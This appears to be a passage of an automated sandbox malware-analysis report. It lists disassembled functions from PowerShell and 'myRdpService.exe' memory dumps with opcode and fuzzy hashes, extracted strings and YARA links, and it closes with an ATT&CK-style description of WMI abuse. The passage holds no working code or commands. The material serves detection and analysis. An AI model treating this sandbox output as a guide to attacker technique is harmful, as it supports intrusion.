Instruction Fuzzy Hash: 41B1C331518A4D4FEBA8DF28C8557E93BE1FF59310F04426EE84DC72A6CB74A845CB92

Function 00007FFC7BB77C64 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7012d710030ec2e73f0f3c5588c94f1be40f59a62f1cb157fb2cc216c770f21b
Instruction ID: 5c08f4b315ed2f62b8113f6d4046ffb2690e4f40819a66032ac6d6ed3cfc181e
Opcode Fuzzy Hash: 7012d710030ec2e73f0f3c5588c94f1be40f59a62f1cb157fb2cc216c770f21b
Instruction Fuzzy Hash: 7731017182966D8EFBB89F39CC09BF93390FF45315F40153AD80D861A6CA786985CB61

Function 00007FFC7BB783C7 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5638f9a5ea995c8e79c7ed15ca07c63433e12dbafca8a152579a3abea930ffb9
Instruction ID: 336a3837602b472e82d7f0931c243770e31ec9adac6079ce3a744b8ec287d5cd
Opcode Fuzzy Hash: 5638f9a5ea995c8e79c7ed15ca07c63433e12dbafca8a152579a3abea930ffb9
Instruction Fuzzy Hash: 6531823160CA4D8FDBA8EF18D8857E837D1FF69320F40426AE84DC3266CA74E945CB91

Function 00007FFC7BB733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
Instruction ID: 318f4ad2ce610b938d812006381c40cb4135e391f67d6ca747baa780745aa424
Opcode Fuzzy Hash: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
Instruction Fuzzy Hash: 1701677111CB0C4FD754EF0CE451AA9B7E0FB99324F10056EE58AC36A5DB36E892CB45

Analysis Process: powershell.exePID: 8792, Parent PID: 6444COMMON

Executed Functions

Function 00007FFC7BB77ED0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

Pp{, xrefs: 00007FFC7BB77EA3
Pp{, xrefs: 00007FFC7BB77F94

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: Pp{$Pp{
API String ID: 0-3113859179
Opcode ID: 0f56ad9b19759c6bade0a310f1e0841f46f0dfe1f34369a3105f2a059909379a
Instruction ID: 75c8938008e8ef44aa7e00f25524258407a4e727858e1a30e0c1b6d2b0467b0b
Opcode Fuzzy Hash: 0f56ad9b19759c6bade0a310f1e0841f46f0dfe1f34369a3105f2a059909379a
Instruction Fuzzy Hash: DE512832818A5D8FEB64DF68C8817FDB7B0FF14310F1041ABD44EA7265DA74A949CB91

Function 00007FFC7BB786F6 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFC7BB7880E

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6d2a6c62593fe6301b7880b9042281c0f740a12d1c417912be3666d4aa3bc1bc
Instruction ID: da2a2935b4a3c7c0d4ff881e033b38b62ff0b21f9c08de07af6327fffc62027e
Opcode Fuzzy Hash: 6d2a6c62593fe6301b7880b9042281c0f740a12d1c417912be3666d4aa3bc1bc
Instruction Fuzzy Hash: 30514A3282D69D4FD719DA399C561E97BD0FF56320F0402FEC89A870E6CE29A407C361

Function 00007FFC7BB7AC32 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

P>{, xrefs: 00007FFC7BB7ACBC

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: P>{
API String ID: 0-1979662257
Opcode ID: 41d414a25ea8e0f1497bbfdec375a29852d748fedcfac3b9a8384d7536240d39
Instruction ID: e5703f4964b800a9350c3a2f8d6d73a352401fd2d0f22d37186ce617974f60b6
Opcode Fuzzy Hash: 41d414a25ea8e0f1497bbfdec375a29852d748fedcfac3b9a8384d7536240d39
Instruction Fuzzy Hash: 71418232A2892D4BDB98E63884956FDB3E1FF58310F4051BBD41EC36A6DE38B945C790

Function 00007FFC7BB7871F Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFC7BB7880E

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9e0937c8a436227daed29535cae294091cfc31f2cfb2d746442a20b7bddd298a
Instruction ID: 43f1b04cbcf87605084fff75f2664ab449bf2b1a40f3d5d2e0c891a82c6faf2f
Opcode Fuzzy Hash: 9e0937c8a436227daed29535cae294091cfc31f2cfb2d746442a20b7bddd298a
Instruction Fuzzy Hash: DC414836C2D6ED4FE715C6395C596E97FD0BF02214F0812FEC89A4B1EACA296406C3A1

Function 00007FFC7BB77EEF Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

Pp{, xrefs: 00007FFC7BB77F94

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: Pp{
API String ID: 0-2453461401
Opcode ID: ac885558a6bc100a404dc10b8a20a5bc0685ed6f1c139c00ec128c2e0dbc67d7
Instruction ID: 90b915826524e296e7a51a25056f275facd0d36e877ccb0062319ea88f65f6c6
Opcode Fuzzy Hash: ac885558a6bc100a404dc10b8a20a5bc0685ed6f1c139c00ec128c2e0dbc67d7
Instruction Fuzzy Hash: 9441B331918A5D8FDF58DF48D881BE9B3B1FF64310F00829AC04EA7255DA74AA89CF85

Function 00007FFC7BB77EAC Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

Pp{, xrefs: 00007FFC7BB77F94

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: Pp{
API String ID: 0-2453461401
Opcode ID: bb5eb5fd5c751ed479a94512b20403331c775dec6cf475c3bdc8e9f9cefcc42f
Instruction ID: f3e7ae11d94ca1a81a6b9fc6ffa4c6fa95eea7c3fa3e9c3bab2c3ec52a9be043
Opcode Fuzzy Hash: bb5eb5fd5c751ed479a94512b20403331c775dec6cf475c3bdc8e9f9cefcc42f
Instruction Fuzzy Hash: 88310432918A5D8FEB64DF18C885BEDB7B0FF28310F0042AAC44DA3255CA74A985CFD1

Function 00007FFC7BB785FC Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

P>{, xrefs: 00007FFC7BB78660

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: P>{
API String ID: 0-1979662257
Opcode ID: 51ccbf5cc029d7d4edf97cf0a61bc43b18e6e9246d802ada471750262e1b8af0
Instruction ID: 8e32b628b7a92d789f36c5bb46a6d1b54e2c76d8cb914e52382110f2835694fc
Opcode Fuzzy Hash: 51ccbf5cc029d7d4edf97cf0a61bc43b18e6e9246d802ada471750262e1b8af0
Instruction Fuzzy Hash: 4931D53251CA9E4FDBA4EB2888456EA77E1FF55310F4401BBD44AC31A7DE28E845C791

Function 00007FFC7BB78738 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFC7BB7880E

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 445925ddf3b5e28a7e7d98a6b9dc531a7dfb12e18db8d1b0153140f8492399f7
Instruction ID: fa482cfc98a0f10b7377e8b0fe6a8398b02c961be6853c7c5933f1d8885bf126
Opcode Fuzzy Hash: 445925ddf3b5e28a7e7d98a6b9dc531a7dfb12e18db8d1b0153140f8492399f7
Instruction Fuzzy Hash: F5313A35C3C6AD4BE759D63998962FC7BD0FF01324F1812BDC89A971DACE29A406C391

Function 00007FFC7BB78751 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFC7BB7880E

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c1de2f27e28329af6571ccb8bd9c25235028e214d59f4ff93ea6c8a13ae761d8
Instruction ID: c11f8ae5fb2f7a0e2ab81407fe3d4ae0ae3a8fe661cced01affe41e7fd6b33ea
Opcode Fuzzy Hash: c1de2f27e28329af6571ccb8bd9c25235028e214d59f4ff93ea6c8a13ae761d8
Instruction Fuzzy Hash: E0213935C3C6BD4AE758DA299C852FC77D0FF11314F0803BEC89A571D5CA29A516C351

Function 00007FFC7BB7B03C Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e811f9a3338ae9968130528a408ea6fbf38a5c2fd62dec99880fd68498fdb16b
Instruction ID: 9af75ebbc3698e6b3ec393e5e75f6dedd0d0eb3de1272c02993009429273a13d
Opcode Fuzzy Hash: e811f9a3338ae9968130528a408ea6fbf38a5c2fd62dec99880fd68498fdb16b
Instruction Fuzzy Hash: 6021943262C6998FD7A0DB78C49876AB7D1FBA8314F104A7BE448C32A5DB74D480CB51

Function 00007FFC7BB7B040 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94f937860f63cd1d0e3476fac66d52812bc4545bdc166de066c9128673b352d
Instruction ID: 8b67fd4bcf8ae7e8f4e69c33974094845d572cb0d345e0ccc914a31e94541ab7
Opcode Fuzzy Hash: f94f937860f63cd1d0e3476fac66d52812bc4545bdc166de066c9128673b352d
Instruction Fuzzy Hash: C811AB3162865D8FD760EA38C49856AB7E1FB94311F104A3BE449C33B5DF74E480CB51

Function 00007FFC7BB76700 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
Instruction ID: 517ac7861441682739a14aac5889c98384aeb4d75d85f7c70e60d0cfe5202ae4
Opcode Fuzzy Hash: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
Instruction Fuzzy Hash: D901963191851E4BEF65DA75C855ABE77F0FF56310F10113EE44B935E6DE242840C7A1

Function 00007FFC7BB733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
Instruction ID: 318f4ad2ce610b938d812006381c40cb4135e391f67d6ca747baa780745aa424
Opcode Fuzzy Hash: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
Instruction Fuzzy Hash: 1701677111CB0C4FD754EF0CE451AA9B7E0FB99324F10056EE58AC36A5DB36E892CB45

Function 00007FFC7BB76FCA Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7333990e07b2d2245682a8f3dc1f47026a00c4a72220d56156edebdd69f277bb
Instruction ID: bc0076718dea615249c1293294982116d2a2aca52fe32e60ebf02e37f2910170
Opcode Fuzzy Hash: 7333990e07b2d2245682a8f3dc1f47026a00c4a72220d56156edebdd69f277bb
Instruction Fuzzy Hash: BFC01212E1CD2E0AE554727870824EDB291EF842207402B77D45AC229EDD1DB94283A1

Function 00007FFC7BB77140 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3491112843c08440ece941aaacf0b8ebea140e8d4f9c456abe39ea73239dfc1
Instruction ID: 82fd04b006843734232a987a2962967f13e31d3deafb378e9460c54a74fd1603
Opcode Fuzzy Hash: a3491112843c08440ece941aaacf0b8ebea140e8d4f9c456abe39ea73239dfc1
Instruction Fuzzy Hash: 73B0929381E7C20ED656492418114601A616A3628032820A7C0444B2AB98188A09932A

Non-executed Functions

Function 00007FFC7BB76B80 Relevance: 7.7, Strings: 6, Instructions: 214COMMON

Download Yara Rule

Strings

X}{, xrefs: 00007FFC7BB76CC1
x~{, xrefs: 00007FFC7BB76D01
}{, xrefs: 00007FFC7BB76CE1
0~{, xrefs: 00007FFC7BB76CF1
8|{, xrefs: 00007FFC7BB76C81
`{{, xrefs: 00007FFC7BB76C51

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: 0~{$8|{$X}{$`{{$x~{$}{
API String ID: 0-3575476220
Opcode ID: e6fa215e3858ba60b1d065bafad9e83955751ca329227df591932e139c5719d2
Instruction ID: fa415ca49308a0ce68296cb97cc4e4e8249f53f0097f56412ec6b38d6b333e9c
Opcode Fuzzy Hash: e6fa215e3858ba60b1d065bafad9e83955751ca329227df591932e139c5719d2
Instruction Fuzzy Hash: 0051F87792E9DA4FF529813C381A1786A42FF59260B2C13FBC449C72EF5C5D5C0E826A

Function 00007FFC7BB76BDB Relevance: 7.7, Strings: 6, Instructions: 201COMMON

Download Yara Rule

Strings

X}{, xrefs: 00007FFC7BB76CC1
x~{, xrefs: 00007FFC7BB76D01
}{, xrefs: 00007FFC7BB76CE1
0~{, xrefs: 00007FFC7BB76CF1
8|{, xrefs: 00007FFC7BB76C81
`{{, xrefs: 00007FFC7BB76C51

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: 0~{$8|{$X}{$`{{$x~{$}{
API String ID: 0-3575476220
Opcode ID: 6abf7beb9dbcc2093d9f28199c98193a3320f7c104502830d8613de2774ac35c
Instruction ID: 2fb4c82c93a14040c7ceebccf16160bab96ffd0218e4dab9a4affd58373d7948
Opcode Fuzzy Hash: 6abf7beb9dbcc2093d9f28199c98193a3320f7c104502830d8613de2774ac35c
Instruction Fuzzy Hash: 1C513AB791E8DA0FF529413C381A1796A82FF59260B1C13FBC449872EF5C5D5C0E825E

Function 00007FFC7BB76FED Relevance: 6.4, Strings: 5, Instructions: 155COMMON

Download Yara Rule

Strings

0~{, xrefs: 00007FFC7BB770E1
x~{, xrefs: 00007FFC7BB770F1
8|{, xrefs: 00007FFC7BB77071
}{, xrefs: 00007FFC7BB770D1
X}{, xrefs: 00007FFC7BB770B1

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: 0~{$8|{$X}{$x~{$}{
API String ID: 0-946211710
Opcode ID: 64a97ebcfbfaac90a7c9cb77394f27df8abbd3facb8c66f535561d8587b75b93
Instruction ID: bda23e4e60eafd27f5d941a5c2822273409845688147f4bc8c7b441a9c0f3ee0
Opcode Fuzzy Hash: 64a97ebcfbfaac90a7c9cb77394f27df8abbd3facb8c66f535561d8587b75b93
Instruction Fuzzy Hash: E45198A392E6D74FF76682792C251346E62BF53250B2C11FBC8884B1EF98585D0DC36B

Function 00007FFC7BB77030 Relevance: 6.4, Strings: 5, Instructions: 127COMMON

Download Yara Rule

Strings

0~{, xrefs: 00007FFC7BB770E1
x~{, xrefs: 00007FFC7BB770F1
8|{, xrefs: 00007FFC7BB77071
}{, xrefs: 00007FFC7BB770D1
X}{, xrefs: 00007FFC7BB770B1

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: 0~{$8|{$X}{$x~{$}{
API String ID: 0-946211710
Opcode ID: b9871c2a65d8bc51d0b51cd85a5e212d5b197ef96a6d731bf80d8756be278fb2
Instruction ID: 46f10f0dd8013e0d0d2945a859268d847ac46c79cde35f8f3c453c3add5bc62e
Opcode Fuzzy Hash: b9871c2a65d8bc51d0b51cd85a5e212d5b197ef96a6d731bf80d8756be278fb2
Instruction Fuzzy Hash: 1641E8A393E9C74FF65681392C161345EA2BF5229072C11FBC488472EF98585E0DC3AB

Function 00007FFC7BB76AA0 Relevance: 6.3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

Strings

Pt{, xrefs: 00007FFC7BB76AC1
(u{, xrefs: 00007FFC7BB76AF1
r{, xrefs: 00007FFC7BB76B21
pu{, xrefs: 00007FFC7BB76B01
t{, xrefs: 00007FFC7BB76AE1

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: (u{$Pt{$pu{$r{$t{
API String ID: 0-1613072833
Opcode ID: dce15aa590f429ac9ce71cf6d11b67b048dc3de94bb0213c7d08b1b6be6fd984
Instruction ID: 20959b5af0bc8e7c36f8d8770fee7924eab7c601ba35c0722e118c2e2ff48531
Opcode Fuzzy Hash: dce15aa590f429ac9ce71cf6d11b67b048dc3de94bb0213c7d08b1b6be6fd984
Instruction Fuzzy Hash: D71194B3A1ECD64BFA68416C3C521395B81FB4A36072C53BBD449872EF5928DD0EC15E

Function 00007FFC7BB77040 Relevance: 5.0, Strings: 4, Instructions: 29COMMON

Download Yara Rule

Strings

0~{, xrefs: 00007FFC7BB770E1
x~{, xrefs: 00007FFC7BB770F1
8|{, xrefs: 00007FFC7BB77071
`{{, xrefs: 00007FFC7BB77041

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: 0~{$8|{$`{{$x~{
API String ID: 0-1549036694
Opcode ID: 7439c60a1dd51a604137a89b204b0fc27060631c642913cc1e96d8e64fa0bf48
Instruction ID: b259ba9de20b5fc31139e1f049e8f3398fd28710c6665f2b46e35f4551f20f40
Opcode Fuzzy Hash: 7439c60a1dd51a604137a89b204b0fc27060631c642913cc1e96d8e64fa0bf48
Instruction Fuzzy Hash: 2BF037A391E6C64FF75A412928215301A92AB5679071C10F7C444472EF58185E0DC36E

Function 00007FFC7BB77000 Relevance: 5.0, Strings: 4, Instructions: 19COMMON

Download Yara Rule

Strings

}{, xrefs: 00007FFC7BB770D1
@z{, xrefs: 00007FFC7BB77001
`{{, xrefs: 00007FFC7BB77041
X}{, xrefs: 00007FFC7BB770B1

Memory Dump Source

Source File: 0000001C.00000002.4192929825.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID: @z{$X}{$`{{$}{
API String ID: 0-589405527
Opcode ID: b6ea5529b2b8ccecccf0403a2a4dd807ca376d61074a47fe082a122606b1cfbb
Instruction ID: d71db1c16caa0006ccd3723e89470092caed15cc8a0d628233a7bb620f64358b
Opcode Fuzzy Hash: b6ea5529b2b8ccecccf0403a2a4dd807ca376d61074a47fe082a122606b1cfbb
Instruction Fuzzy Hash: 82E0486783E6D74EE756423518152345D617F72250B2C20F7C8844B1FF99585D48D367

Analysis Process: myRdpService.exePID: 2236, Parent PID: 904COMMON

Non-executed Functions

Function 00007FF7276DDB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7276DDB2C
GetCurrentThreadId.KERNEL32 ref: 00007FF7276DDB3A
GetCurrentProcessId.KERNEL32 ref: 00007FF7276DDB46
QueryPerformanceCounter.KERNEL32 ref: 00007FF7276DDB56

Memory Dump Source

Source File: 0000002D.00000002.4758977606.00007FF727621000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727620000, based on PE: true

Associated: 0000002D.00000002.4758896640.00007FF727620000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4760412983.00007FF727B26000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4761086851.00007FF727CE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4761086851.00007FF727E2A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4761086851.00007FF727E2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762448650.00007FF728080000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF728082000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF72808C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF72809E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF7280A0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF7280A3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4762526583.00007FF7280A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000002D.00000002.4763026768.00007FF7280A8000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_45_2_7ff727620000_myRdpService.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
Instruction ID: 3dc66674a83723e31f0622accc1cccb0090f77076f4c71f1e9a8d654d6324f3e
Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
Instruction Fuzzy Hash: 58118832B18F018AEB00AB70EC552A873A4FB19768F841A31EA6D427A4DF38D0958750

Analysis Process: powershell.exePID: 2828, Parent PID: 8152COMMON

Executed Functions

Function 00007FFC7BC10411 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.4573163707.00007FFC7BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffc7bc10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7a92389883cca0a3be85be55c950e76b2e4476f9cae9f2e3769c4f2235812c
Instruction ID: 900f0e28a20784a2e807ede70309ada0fe50dd64e803fedfad4feac25a8eed7d
Opcode Fuzzy Hash: de7a92389883cca0a3be85be55c950e76b2e4476f9cae9f2e3769c4f2235812c
Instruction Fuzzy Hash: C9818BB291DA9D4FEB91EB2898585B93BE0FF59340F1441BBD40CD71A7EB28E805C361

Function 00007FFC7BB434B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.4568333322.00007FFC7BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffc7bb40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
Instruction ID: 189409b59077ce0250e9e055c92c8678d7fdf168c6c0c6e1aef78a2b1f29b538
Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
Instruction Fuzzy Hash: C401677111CB0C4FD744EF0CE451AA9B7E0FB99324F10056EE59AC3665D736E892CB45

Analysis Process: powershell.exePID: 6248, Parent PID: 6444COMMON

Executed Functions

Function 00007FFC7BB533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.4749411356.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003661b200d2f9fb1536db0c3f240a50875bb7ee753b168354bcfe3d465bef9d
Instruction ID: 4f99702751513a775d66cef837e43488e123b54a73caa5a98ed8b0c64b35d5c9
Opcode Fuzzy Hash: 003661b200d2f9fb1536db0c3f240a50875bb7ee753b168354bcfe3d465bef9d
Instruction Fuzzy Hash: 0901447111CB0C4FD744EF0CE451AA9B7E0FB99324F10056EE58AC3665DA26E892CB46

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
